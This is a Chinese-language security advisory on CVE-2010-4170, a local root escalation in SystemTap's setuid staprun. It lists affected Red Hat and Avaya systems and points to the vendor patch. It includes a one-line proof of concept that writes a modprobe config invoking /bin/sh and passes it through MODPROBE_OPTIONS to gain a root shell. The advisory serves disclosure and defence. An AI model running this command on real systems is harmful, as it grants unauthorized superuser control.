安全研究

安全漏洞
SystemTap "modprob"命令环境变量本地权限提升漏洞

发布日期:2010-01-01
更新日期:2010-11-30

受影响系统:
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4 Extras
AVAYA Message Storage Server 5.1
AVAYA Message Storage Server 5.0
AVAYA Message Storage Server 4.0
SystemTap SystemTap 1.1
SystemTap SystemTap 1.0
SystemTap SystemTap 0.0.20090314
SystemTap SystemTap 0.0.20080705
描述:
BUGTRAQ  ID: 44914
CVE ID: CVE-2010-4170

SystemTap是一种Linux内核诊断工具,允许从运行的Linux内核快速和安全的获取信息。

SystemTap的实现上存在漏洞,本地攻击者可利用此漏洞用超级用户权限执行任意代码,并完全控制受影响的计算机。

setuid-root /usr/bin/staprun程序中存在两个严重的错误。systemtap运行时工具(staprun)没有安全地处理用户指定模块的加载,本地攻击者可利用此漏洞提升其权限。

<*来源:Tavis Ormandy (taviso@gentoo.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Tavis Ormandy (taviso@gentoo.org)提供了如下测试方法:

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C
exploit.conf" staprun -u whatever

建议:
厂商补丁:

SystemTap
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://sourceware.org/systemtap/

浏览次数:2910
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障